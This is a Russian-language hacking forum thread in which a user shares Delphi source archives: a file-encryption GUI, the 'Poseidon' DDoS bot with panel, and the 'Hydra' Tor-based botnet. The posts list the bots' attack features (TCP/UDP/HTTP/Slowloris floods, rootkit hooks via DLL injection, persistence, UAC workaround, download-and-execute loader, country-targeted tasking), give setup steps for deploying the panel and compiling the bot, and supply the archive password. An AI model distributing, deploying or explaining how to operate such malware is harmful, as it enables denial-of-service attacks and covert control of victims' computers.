• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

Исходники всякой хрени на Delphi


Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Исходник (правда старенький) тулзы DarkCrypt GUI.Краткое описание:программа позволяет шифровать любые файлы одним из 80 мощнейших алгоритмов шифрования используя 5 различных режимов. Реализует также шифрование по типу PGP. Аналог плагина DarkCryptTC, фактически - его оболочка для работы вне Total Commander.Более подробно можете почитать (и скачать,более продвинутую версию) здесь:https://ru-sphere.ru/threads/dec0der.1680/#post-88993
Снимок.JPG
 

Вложения

  • darkcrypt-gui.rar
    2.6 МБ · Просмотры: 162

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Посейдон бот +панелька
Снимок.PNG


- TCP Flood
- UDP Flood
- HTTP Flood
- Slow post HTTP Flood
- HTTP Download Flood
- SlowLoris Flood
- ARME Flood
*Poseidon generates random User agents and Referrers during DDos attacks
*Poseidon can attack many targets at once
*All attacks are configured through control panel depending on the Poseidon user's needs!
* Stealth/Protection/Startup and other Unique features
- Persistance
*This module works only when RootKit is disabled
*If server stopped work for some reason persistance module will restore it
- Rootkit x86*x64 bit
*Works on both x86 and x64 bit Windows platforms
*Hide Registry keys
*Hide Bot process
*Hide Bot file
- UAC workaround
*Bot is UAC friendly Smile
- Startup
*Startup guarantees that your server will still work after restart of slave's pc!
- BotKiller
*BotKiller scans memory for Bot-activity , destroys any malware which was found.
- Loader
*Download and Execute file
*Update File
- Traffic encryption
*All traffic between panel <> Bot is encrypted using RC4.
Rootkit is split in two parts.
x86 and x64
x86:
----
DLL injection, uses CreateRemoteThread
Uses pHook, and BEA LDE32.
Hooks NtQuerySystemInformation, NtEnumerateKey, NtEnumerateValueKey, NtOpenFile, NtQueryDirectoryFile.
x64:
DLL injection, uses a x64 DLL injector to inject DLL, uses CreateRemoteThread
Uses pHook64 and BEA LDE64
Hooks same as x86.
Control Panel Features
--- Statistics
*Shows statistics about bots , online bots ,idle bots and etc.
- Sort by Countries
*You can choose specific countries to send commands (For example Download/execute to Italian bots only)
- Tasks
*Allows you to set task , which will be executed at specific time
-Logs
*Provides you logs [/spoiler]
 

Вложения

  • Bot.rar
    4 МБ · Просмотры: 217

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
hydraPanel4.0.jpg

Hydra Botnet (Tor Based Botnet)
Hydra Botnet is a tor based prof of concept.
hydra is a modified version of umbra loader made for use over tor, the panel is from aldi botnet as i am lazy.

i am not responsible for what you do with this code.

the botnet has some simple functions.

DownloadEx*
Update*
Uninstall

Plugin Commands
DownloadPlugin*
InjectPlugin*
InjectOnce*
ReloadPlugins
UninstallPlugin*win.dll

panel is protected by user agent and captcha
gate.php is protected by user agent.
communication between bot and panel is base64 encoded
both bot and panel have incomplete plugin system. (will release example later plugin is just a .dll that can be injected.)

tor.exe is ever carried with the bot or downloaded when run.
panel has Bots, Tasks, Statistics, Plugins, Passwords, Uploader, Log out
Password was meant to be used by plugin system but never finished.
[credits]
Credit to slayer616
credit to the creator of aldi botnet

[setup]
upload panel to host.
edit /admin/inc/config.php

edit untsettings.pas
compile bot in delphi xe 2 with indy installed

[Warning]
the bot with connect to a public server to get its ip address, if you don't like it change it.

Для компиляции требуется delphi xe 2
Пасс на архив:111
 

Вложения

  • HydraBot_4.0_Public.rar
    1.5 МБ · Просмотры: 182

Hunchback

Пользователь
Форумчанин
Регистрация
23.10.2016
Сообщения
13
Репутация
1
Спасибо конечно, но ни кто в паблик не сольет актуальный ботнет, тем более на дельфи, язык для тех кто уже принял темную сторону силы, вычислят кто проплачивал домен или вдс и посадят, да и анонимно оплатить весьма палевно. Современные бекдоры в tor сети с базовой станцией общаются.

Но это дает кучу бесценной информации которую ни где не найти кроме как в исходниках старых ботнетов.
 
Верх Низ